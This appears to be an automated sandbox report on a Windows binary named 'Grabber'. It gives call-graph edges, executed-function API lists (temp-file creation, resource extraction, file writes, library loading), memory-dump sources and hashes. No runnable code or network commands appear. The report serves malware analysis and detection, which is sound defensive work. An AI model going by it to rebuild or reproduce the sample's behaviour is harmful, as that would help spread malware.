9508->9510 9509 402610 9543 40de80 GetLastError TlsGetValue SetLastError 9509->9543 9555 405170 TlsGetValue 9510->9555 9513 402677 9516 40df50 HeapFree 9513->9516 9514 402618 9544 40de80 GetLastError TlsGetValue SetLastError 9514->9544 9518 40268f 9516->9518 9517 402620 9545 40de80 GetLastError TlsGetValue SetLastError 9517->9545 9521 40df50 HeapFree 9518->9521 9520 402628 9546 406110 9520->9546 9523 402698 9521->9523 9525 40df50 HeapFree 9523->9525 9524 402639 9553 405182 TlsGetValue 9524->9553 9527 4026a1 9525->9527 9529 40df50 HeapFree 9527->9529 9528 40263e 9530 406060 5 API calls 9528->9530 9531 4026aa 9529->9531 9532 402646 9530->9532 9533 40df50 HeapFree 9531->9533 9534 40dec0 3 API calls 9532->9534 9535 401ea4 9533->9535 9534->9498 9535->8708 9536->8714 9537->8703 9538->9479 9539->9481 9540->9490 9541->9501 9542->9509 9543->9514 9544->9517 9545->9520 9547 406146 9546->9547 9549 406118 9546->9549 9565 40e340 TlsGetValue 9547->9565 9549->9549 9556 406080 9549->9556 9550 40614f 9550->9524 9553->9528 9554->9506 9555->9513 9557 40e1e0 TlsGetValue 9556->9557 9558 40609c 9557->9558 9559 40e260 3 API calls 9558->9559 9560 4060a8 9559->9560 9561 4060b4 9560->9561 9566 40e370 TlsGetValue 9560->9566 9567 40e3f0 TlsGetValue 9561->9567 9564 4060fd 9564->9524 9565->9550 9566->9561 9567->9564 9568->8736 9569->8738 9570->8741 9571->8743 9572->8749 9573->8757 9574->8759 9575->8761 9576->8763 9577->8767 9578->8773 9579->8775 9580->8777 9581->8779 9582->8783 9583->8789 9584->8791 9585->8793 9586->8795 9587->8799 9588->8805 9589->8807 9590->8809 9591->8811 9592->8815 9593->8821 9595 40dfc0 21 API calls 9594->9595 9596 403ce3 9595->9596 9597 4051a0 3 API calls 9596->9597 9598 403cec 9597->9598 9599 405060 2 API calls 9598->9599 9600 403cf8 FindResourceW 9599->9600 9601 403db3 9600->9601 9602 403d1b 9600->9602 9724 40de80 GetLastError TlsGetValue SetLastError 9601->9724 9603 4026b8 26 API calls 9602->9603 9605 403d2a 9603->9605 9607 4046ef HeapSize 9605->9607 9606 403dbd 9608 40e020 4 API calls 9606->9608 9609 403d37 9607->9609 9610 403dc5 9608->9610 9671 4011de 9609->9671 9725 405170 TlsGetValue 9610->9725 9614 403dcc 9617 40df50 HeapFree 9614->9617 9615 403d5a 9695 4046ff 9615->9695 9616 403d7c 9711 40de80 GetLastError TlsGetValue SetLastError 9616->9711 9620 403de3 9617->9620 9623 40df50 HeapFree 9620->9623 9622 403d82 9712 40de80 GetLastError TlsGetValue SetLastError 9622->9712 9626 403a61 9623->9626 9626->8824 9627 403d7a 9726 40e0b0 TlsGetValue 9627->9726 9628 403d8a 9713 409cb0 9628->9713 9630 403da0 9632 40dec0 3 API calls 9630->9632 9633 403daa 9632->9633 9723 409b80 HeapFree 9633->9723 9635->8827 9636->8833 9637->8839 9638->8845 9639->8851 9640->8853 9641->8855 9642->8859 9643->8861 9803 406310 9644->9803 9646 403b28 9646->8864 9647->8867 9648->8869 9649->8871 9650->8875 9651->8877 9652->8883 9653->8885 9654->8897 9655->8899 9657 405060 2 API calls 9656->9657 9658 40241f 9657->9658 9659 405060 2 API calls 9658->9659 9660 40242c 9659->9660 9833 40acb0 9660->9833 9664 402457 9665 40a9d0 11 API calls 9664->9665 9666 402464 9665->9666 9667 40df50 HeapFree 9666->9667 9668 40248b 9667->9668 9669 40df50 HeapFree 9668->9669 9670 402494 9669->9670 9670->8902 9672 4011e6 9671->9672 9672->9672 9673 405060 2 API calls 9672->9673 9674 4011ff 9673->9674 9727 405700 9674->9727 9677 409b60 HeapSize 9678 401214 9677->9678 9679 40dbca 4 API calls 9678->9679 9680 401236 9679->9680 9681 40dbca 4 API calls 9680->9681 9682 401254 9681->9682 9683 40dbca 4 API calls 9682->9683 9684 4014ac 9683->9684 9685 40dbca 4 API calls 9684->9685 9686 4014ca 9685->9686 9734 409b80 HeapFree 9686->9734 9688 4014d3 9689 40df50 HeapFree 9688->9689 9690 4014e3 9689->9690 9691 40dd1d 2 API calls 9690->9691 9692 4014ed 9691->9692 9693 40dd1d 2 API calls 9692->9693 9694 4014f6 9693->9694 9694->9615 9694->9616 9696 40dfc0 21 API calls 9695->9696 9697 40470d 9696->9697 9698 405060 2 API calls 9697->9698 9699 404719 9698->9699 9700 40472c 9699->9700 9735 40249b 9699->9735 9709 40473d 9700->9709 9744 40acd0 9700->9744 9703 40df50 HeapFree 9704 403d71 9703->9704 9710 409b80 HeapFree 9704->9710 9705 40474f 9706 40478f 9705->9706 9705->9709 9755 40afb0 9705->9755 9708 40a9d0 11 API calls 9706->9708 9708->9709 9709->9703 9710->9627 9711->9622 9712->9628 9714 409cd0 9713->9714 9717 409d28 9713->9717 9715 40e260 3 API calls 9714->9715 9716 409cf9 9715->9716 9802 40e3f0 TlsGetValue 9716->9802 9718 409d83 MultiByteToWideChar 9717->9718 9720 40e260 3 API calls 9718->9720 9722 409da0 MultiByteToWideChar 9720->9722 9721 409d1d 9721->9630 9722->9630 9723->9601 9724->9606 9725->9614 9726->9614 9728 405710 WideCharToMultiByte 9727->9728 9729 40570b 9727->9729 9730 409ba0 RtlAllocateHeap 9728->9730 9729->9728 9731 405730 9730->9731 9732 405736 WideCharToMultiByte 9731->9732 9733 401207 9731->9733 9732->9733 9733->9677 9734->9688 9736 405060 2 API calls 9735->9736 9737 4024ac 9736->9737 9766 40ada0 9737->9766 9740 4024d3 9742 40df50 HeapFree 9740->9742 9741 40a9d0 11 API calls 9741->9740 9743 4024eb 9742->9743 9743->9700 9745 40d498 5 API calls 9744->9745 9746 40ace5 9745->9746 9747 40ad97 9746->9747 9748 40acef CreateFileW 9746->9748 9747->9705 9749 40ad10 CreateFileW 9748->9749 9750 40ad2c 9748->9750 9749->9750 9751 40ad4d 9749->9751 9750->9751 9752 40ad39 HeapAlloc 9750->9752 9753 40d40a 4 API calls 9751->9753 9754 40ad8e 9751->9754 9752->9751 9753->9754 9754->9705 9756 40afc2 9755->9756 9757 40b015 9755->9757 9758 40b00d 9756->9758 9759 40d459 2 API calls 9756->9759 9757->9706 9758->9706 9760 40afda 9759->9760 9761 40b003 9760->9761 9762 40aff2 WriteFile 9760->9762 9763 40afe4 9760->9763 9761->9706 9762->9761 9791 40b020 9763->9791 9765 40afec 9765->9706 9769 40aac0 9766->9769 9768 4024bf 9768->9740 9768->9741 9770 40aad8 9769->9770 9771 40d498 5 API calls 9770->9771 9772 40aaef 9771->9772 9773 40aca2 9772->9773 9774 40ab02 9772->9774 9775 40ab3e 9772->9775 9773->9768 9777 40ab19 9774->9777 9778 40ab1c CreateFileW 9774->9778 9776 40ab43 9775->9776 9781 40ab7c 9775->9781 9779 40ab5a 9776->9779 9780 40ab5d CreateFileW 9776->9780 9777->9778 9785 40abe8 9778->9785 9779->9780 9780->9785 9782 40aba7 CreateFileW 9781->9782 9781->9785 9784 40abc9 CreateFileW 9782->9784 9782->9785 9783 40ac70 9787 40d40a 4 API calls 9783->9787 9790 40ac81 9783->9790 9784->9785 9785->9783 9786 40ac22 9785->9786 9788 40ac0e HeapAlloc 9785->9788 9786->9783 9789 40ac5c SetFilePointer 9786->9789 9787->9773 9788->9786 9789->9783 9790->9768 9792 40b127 9791->9792 9793 40b03a 9791->9793 9792->9765 9794 40b040 SetFilePointer 9793->9794 9795 40b06b 9793->9795 9794->9795 9797 40aa40 WriteFile 9795->9797 9799 40b077 9795->9799 9796 40b0a7 9796->9765 9798 40b0ee 9797->9798 9798->9799 9800 40b0f5 WriteFile 9798->9800 9799->9796 9801 40b091 memcpy 9799->9801 9800->9765 9801->9765 9802->9721 9804 40631f 9803->9804 9805 406438 9804->9805 9816 4063ae 9804->9816 9806 40e1e0 TlsGetValue 9805->9806 9808 406442 9806->9808 9807 40660a 9807->9646 9809 40645a 9808->9809 9810 40644a _wcsdup 9808->9810 9811 40e1e0 TlsGetValue 9809->9811 9810->9809 9812 406460 9811->9812 9813 406477 9812->9813 9814 406468 _wcsdup 9812->9814 9815 40e1e0 TlsGetValue 9813->9815 9814->9813 9817 406480 9815->9817 9816->9807 9818 4063fc wcsncpy 9816->9818 9820 40642e 9816->9820 9819 406488 _wcsdup 9817->9819 9822 406498 9817->9822 9818->9816 9819->9822 9820->9646 9821 40e260 3 API calls 9823 406520 9821->9823 9822->9821 9824 406572 wcsncpy 9823->9824 9825 406526 9823->9825 9828 40658d 9823->9828 9824->9828 9826 4065e4 9825->9826 9827 4065db free 9825->9827 9829 4065f7 9826->9829 9830 4065eb free 9826->9830 9827->9826 9828->9825 9832 406625 wcsncpy 9828->9832 9829->9807 9831 4065fe free 9829->9831 9830->9829 9831->9807 9832->9828 9834 40aac0 15 API calls 9833->9834 9835 40243f 9834->9835 9835->9666 9836 40af80 9835->9836 9837 40d459 2 API calls 9836->9837 9838 40af8f 9837->9838 9839 40afa3 9838->9839 9842 40ae80 9838->9842 9839->9664 9841 40afa0 9841->9664 9843 40af74 9842->9843 9844 40ae94 9842->9844 9843->9841 9844->9843 9845 40aea8 9844->9845 9846 40af0d 9844->9846 9848 40aee0 9845->9848 9849 40aeb8 9845->9849 9860 40b130 WideCharToMultiByte 9846->9860 9848->9848 9850 40aeeb WriteFile 9848->9850 9853 40b020 4 API calls 9849->9853 9850->9841 9851 40af27 9852 40af6b 9851->9852 9854 40af37 9851->9854 9855 40af48 WriteFile 9851->9855 9852->9841 9856 40aeda 9853->9856 9857 40b020 4 API calls 9854->9857 9858 40af5c HeapFree 9855->9858 9856->9841 9859 40af42 9857->9859 9858->9852 9859->9858 9861 40b155 HeapAlloc 9860->9861 9862 40b18e 9860->9862 9863 40b189 9861->9863 9864 40b16c WideCharToMultiByte 9861->9864 9862->9851 9863->9851 9864->9863 10167->7796 10168->7798 10169->7800 10170->7802 10171->7806 10172->7812 10173->7814 10174->7816 10175->7818 10176->7822 10177->7830 10178->7836 10179->7838 10180->7845 10181->7847 10182->7849 10183->7851 10184->7855 10185->7861 10186->7863 10187->7865 10188->7867 10189->7871 10190->7877 10191->7883 10192->7889 10193->7891 10194->7897 10195->7903 10453 406289 10454 406290 10453->10454 10454->10454 10457 40e3f0 TlsGetValue 10454->10457 10456 4062b5 10457->10456 10196 40b020 10197 40b127 10196->10197 10198 40b03a 10196->10198 10199 40b040 SetFilePointer 10198->10199 10200 40b06b 10198->10200 10199->10200 10202 40aa40 WriteFile 10200->10202 10204 40b077 10200->10204 10201 40b0a7 10203 40b0ee 10202->10203 10203->10204 10205 40b0f5 WriteFile 10203->10205 10204->10201 10206 40b091 memcpy 10204->10206 10616 401f3b 10617 40dfc0 21 API calls 10616->10617 10618 401f43 10617->10618 10639 40de80 GetLastError TlsGetValue SetLastError 10618->10639 10620 401f49 10640 40de80 GetLastError TlsGetValue SetLastError 10620->10640 10622 401f5a 10623 40e020 4 API calls 10622->10623 10624 401f62 10623->10624 10641 40de80 GetLastError TlsGetValue SetLastError 10624->10641 10626 401f68 10642 40de80 GetLastError TlsGetValue SetLastError 10626->10642 10628 401f70 10643 409b10 10628->10643 10632 401f7d 10647 405182 TlsGetValue 10632->10647 10634 401f88 10635 408e27 20 API calls 10634->10635 10636 401f91 10635->10636 10637 4051a0 3 API calls 10636->10637 10638 401f96 10637->10638 10638->10638 10639->10620 10640->10622 10641->10626 10642->10628 10648 409aa0 10643->10648 10646 40e080 TlsGetValue 10646->10632 10647->10634 10649 409ab0 10648->10649 10650 40e260 3 API calls 10649->10650 10651 401f77 10650->10651 10651->10646 10207 4011bf 10234 405379 EnterCriticalSection 10207->10234 10209 4011c4 10220 409950 SetUnhandledExceptionFilter 10209->10220 10211 4011c9 10221 40a6b5 10211->10221 10217 4011d8 10233 409b30 HeapDestroy 10217->10233 10219 4011dd 10220->10211 10222 4011ce 10221->10222 10223 40a6be 10221->10223 10225 40aa90 10222->10225 10224 40d9f5 2 API calls 10223->10224 10224->10222 10226 40d9f5 2 API calls 10225->10226 10227 4011d3 10226->10227 10228 40d2c4 10227->10228 10229 40d2d1 10228->10229 10230 40d2d2 10228->10230 10229->10217 10231 40d2e7 10230->10231 10232 40d2db TlsFree 10230->10232 10231->10217 10232->10231 10233->10219 10235 4053b2 LeaveCriticalSection 10234->10235 10236 40538f 10234->10236 10235->10209 10237 405390 CloseHandle 10236->10237 10239 4053b1 10236->10239 10238 40db32 HeapFree 10237->10238 10238->10236 10239->10235

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          Function 0040195B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 168COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                                                                                                                                                                                                                          • GetTempFileNameW.KERNEL32(?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004043B9), ref: 00401A2A
                                                                                                                                                                                                                          • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000), ref: 00401A7F
                                                                                                                                                                                                                          • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401AD4
                                                                                                                                                                                                                          • PathAddBackslashW.SHLWAPI(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401ADF
                                                                                                                                                                                                                          • PathRenameExtensionW.SHLWAPI(?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000), ref: 00401B1E
                                                                                                                                                                                                                          • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024), ref: 00401B38
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02190000,00000000,?), ref: 0040DEF9
                                                                                                                                                                                                                            • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(02190000,00000000,?,?), ref: 0040DF1C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileNameTemp$Value$AllocateErrorHeapLastPath$BackslashExtensionRenamewcslen
                                                                                                                                                                                                                          • String ID: $pA$$pA$$pA$$pA
                                                                                                                                                                                                                          • API String ID: 368575804-1531182785
                                                                                                                                                                                                                          • Opcode ID: a7855c2fcb8ff53b5addb0dc43bc834e5fe5e71e8a4854cba452ae3e114c04c7
                                                                                                                                                                                                                          • Instruction ID: 28b0c429ac0839269b991b7b7970ea1d3eb295239ca2258b2b80e935eceb64c8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7855c2fcb8ff53b5addb0dc43bc834e5fe5e71e8a4854cba452ae3e114c04c7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD510AB1514600AED600BBB1EC4297F7B7EEB98319F01883FF544690A2CA3D985D9A6D
                                                                                                                                                                                                                          Function 00401000 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040100F
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040101C
                                                                                                                                                                                                                          • HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035
                                                                                                                                                                                                                            • Part of subcall function 0040DE30: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE3C
                                                                                                                                                                                                                            • Part of subcall function 0040DE30: TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE47
                                                                                                                                                                                                                            • Part of subcall function 00409B40: HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409B49
                                                                                                                                                                                                                            • Part of subcall function 00409669: InitializeCriticalSection.KERNEL32(004186D0,00000004,00000004,0040963C,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 00409691
                                                                                                                                                                                                                            • Part of subcall function 00408DEE: memset.MSVCRT ref: 00408DFB
                                                                                                                                                                                                                            • Part of subcall function 00408DEE: InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
                                                                                                                                                                                                                            • Part of subcall function 00408DEE: CoInitialize.OLE32(00000000), ref: 00408E1D
                                                                                                                                                                                                                            • Part of subcall function 004053BB: InitializeCriticalSection.KERNEL32(004186A8,0040107B,00000000,00001000,00000000,00000000), ref: 004053C0
                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                                            • Part of subcall function 00409DE0: HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409DFF
                                                                                                                                                                                                                            • Part of subcall function 00409DE0: HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E25
                                                                                                                                                                                                                            • Part of subcall function 00409DE0: HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409E82
                                                                                                                                                                                                                            • Part of subcall function 0040A3DA: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000), ref: 0040A418
                                                                                                                                                                                                                            • Part of subcall function 0040A3DA: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A431
                                                                                                                                                                                                                            • Part of subcall function 0040A3DA: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A43B
                                                                                                                                                                                                                            • Part of subcall function 0040A348: HeapAlloc.KERNEL32(00000000,00000034,?,?,?,004010E9,00000008,00000000,00417078,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A35B
                                                                                                                                                                                                                            • Part of subcall function 0040A348: HeapAlloc.KERNEL32(FFFFFFF5,00000008,?,?,?,004010E9,00000008,00000000,00417078,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A370
                                                                                                                                                                                                                            • Part of subcall function 0040DBCA: RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 0040DBFA
                                                                                                                                                                                                                            • Part of subcall function 0040DBCA: memset.MSVCRT ref: 0040DC35
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02190000,00000000,?), ref: 0040DEF9
                                                                                                                                                                                                                            • Part of subcall function 00401B8F: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048,00000000), ref: 00401BCD
                                                                                                                                                                                                                            • Part of subcall function 00401B8F: EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BEA
                                                                                                                                                                                                                            • Part of subcall function 00401B8F: FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048), ref: 00401BF2
                                                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 004011A5
                                                                                                                                                                                                                          • HeapDestroy.KERNEL32(00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 004011B5
                                                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 004011BA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$Alloc$Free$CreateInitializememset$AllocateCriticalErrorExitHandleLastLibraryProcessSectionValue$CommonControlsDestroyEnumInitLoadModuleResourceTypes
                                                                                                                                                                                                                          • String ID: .pA$:pA
                                                                                                                                                                                                                          • API String ID: 3272620648-1142403416
                                                                                                                                                                                                                          • Opcode ID: aeb853c391caed1c2c3882624e056ccfb4376f2f5b63a4476772703c942bec8d
                                                                                                                                                                                                                          • Instruction ID: 59fd392a0a4490bdbbe753bcbaae00d60dcbf108960a32b110b84fea6de29b28
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aeb853c391caed1c2c3882624e056ccfb4376f2f5b63a4476772703c942bec8d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C313070A80704A9D210B7F29D43F9E3A25AB1874DF51843FB644790E3CEBC55489A6F
                                                                                                                                                                                                                          Function 00403DF3 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 640COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 145 403df3-403df4 146 403df9-403e04 145->146 146->146 147 403e06-403e1c call 40dfc0 146->147 150 403e1e-403e26 147->150 151 403e28-403e8a call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 150->151 152 403e8c-403e9d 150->152 151->150 151->152 153 403e9f-403ea7 152->153 156 403ea9-403f0b call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 153->156 157 403f0d-403f1e 153->157 156->153 156->157 160 403f20-403f28 157->160 163 403f2a-403f8c call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 160->163 164 403f8e-403f9f 160->164 163->160 163->164 168 403fa1-403fa9 164->168 172 403fab-40400d call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 168->172 173 40400f-404020 168->173 172->168 172->173 178 404022-40402a 173->178 183 404090-4040a1 178->183 184 40402c-404086 call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 178->184 190 4040a3-4040ab 183->190 303 40408b-40408e 184->303 196 404115-404126 190->196 197 4040ad-404113 call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 190->197 204 404128-404130 196->204 197->190 197->196 205 404132-404198 call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 204->205 206 40419a-4041ab 204->206 205->204 205->206 215 4041ad-4041b5 206->215 224 4041b7-404215 call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 215->224 225 40421f-404230 215->225 330 40421a-40421d 224->330 235 404232-40423a 225->235 245 4042a4-4044ef call 40de80 call 40e020 * 2 call 40dec0 call 40de80 call 403275 call 40dec0 call 40985e GetModuleHandleW call 40de80 * 4 call 40d100 call 405182 call 405eb0 call 40dec0 call 40de80 * 4 call 40d100 call 405182 call 405eb0 call 40dec0 call 402e9d call 40de80 call 4021a4 call 4051a0 call 40195b call 40460e call 40de80 call 405100 call 40358d call 40dec0 PathRemoveBackslashW call 40213e call 40de80 * 2 call 402bfa call 40e080 call 405182 call 4098c0 call 4051a0 call 40de80 call 40e020 * 2 call 40dec0 call 40de80 call 401e55 call 40dec0 call 403855 call 40de80 call 40e020 call 40dec0 PathQuoteSpacesW call 40de80 call 40e020 * 3 call 40dec0 PathQuoteSpacesW 235->245 246 40423c-4042a2 call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 235->246 437 4044f1-404507 call 405492 245->437 438 404509-40450d call 402ca9 245->438 246->235 246->245 303->178 303->183 330->215 330->225 441 404512-40460d call 40de80 * 2 call 40e020 * 3 call 40e080 call 40de80 * 2 call 40a7f5 call 40e080 call 40de80 call 40e020 * 2 call 405182 * 3 call 402022 call 4051a0 call 401fa9 call 40df50 * 10 437->441 438->441
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02190000,00000000,?), ref: 0040DEF9
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                                                                                                                                                                                                            • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(02190000,00000000,?,?), ref: 0040DF1C
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,?,00000000,00000000,?,02199F70,00000000,00000000), ref: 004042FB
                                                                                                                                                                                                                          • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 004043F4
                                                                                                                                                                                                                            • Part of subcall function 00402BFA: GetShortPathNameW.KERNEL32(02199F70,02199F70,00002710), ref: 00402C34
                                                                                                                                                                                                                            • Part of subcall function 0040E080: TlsGetValue.KERNEL32(0000000D,?,?,00401DCE,00000000,00000000,00000000,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000), ref: 0040E08A
                                                                                                                                                                                                                            • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
